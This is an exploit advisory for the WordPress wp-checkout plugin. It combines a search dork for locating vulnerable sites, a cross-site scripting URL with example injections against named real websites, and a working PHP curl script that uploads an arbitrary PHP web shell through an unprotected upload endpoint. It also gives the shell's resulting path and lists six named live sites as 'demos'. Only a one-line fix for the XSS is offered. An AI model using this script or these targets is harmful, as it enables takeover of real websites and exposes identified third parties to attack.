WordPress WP-Checkout plugin suffers from cross site scripting and remote shell upload vulnerabilities. Note that this advisory has site-specific information.
8b75a731806da2c71e99adf68bf4ec4bcc441e9e2a626f2793e02907deffc994
#Title : Wordpress Plugin wp-checkout XSS / Arbitrary File Upload
#Author : DevilScreaM
#Date : 10/31/2013
#Category : Web Applications
#Type : PHP
#Greetz : 0day-id.com | newbie-security.or.id | Borneo Security | Indonesian Security
Indonesian Hacker | Indonesian Exploiter | Indonesian Cyber
#Thanks : ShadoWNamE | gruberr0r | Win32Conficker | Rec0ded |
#Vulnerabillity : xss, Arbitrary File Upload
#Dork :
inurl:wp-content/plugins/wp-checkout
Cross Site Scripting
http://site-target/wp-content/plugins/wp-checkout/vendors/timthumb.php?src=[XSS]
Example
http://osteopathywinchester.co.uk/wp-content/plugins/wp-checkout/vendors/timthumb.php?src=<h1>DevilScreaM</h1>
http://pacificcrest.org/wp-content/plugins/wp-checkout/vendors/timthumb.php?src=<h1>DevilScreaM</h1>
Solution
Upgrade Version Timthumb or Delete Files timthumb.php
=================================================================================================
Arbitrary File Upload
Exploit : http://site-target/wp-content/plugins/wp-checkout/vendors/ajaxupload/upload.php
<?php
$uploadfile="devilscream.php";
$ch = curl_init("http://site-target/wp-content/plugins/wp-checkout/vendors/ajaxupload/upload.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
array('Filedata'=>"@$uploadfile",
'folder'=>'/wp-content/uploads/wp-checkout/'));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?>
Shell Access : http://site-target/wp-content/uploads/wp-checkout/devilscream.php
Demo :
http://prittybypri.com/wp-content/plugins/wp-checkout/vendors/ajaxupload/upload.php
http://windham73.com/wp-content/plugins/wp-checkout/vendors/ajaxupload/upload.php
http://twobuttons.com/wp-content/plugins/wp-checkout/vendors/ajaxupload/upload.php
http://riosdeaguavivaupci.com/hp_wordpress/wp-content/plugins/wp-checkout/vendors/ajaxupload/upload.php
http://brookesprevention.org/wp-content/plugins/wp-checkout/vendors/ajaxupload/upload.php
http://theheartofawoman.net/wp-content/plugins/wp-checkout/vendors/ajaxupload/upload.php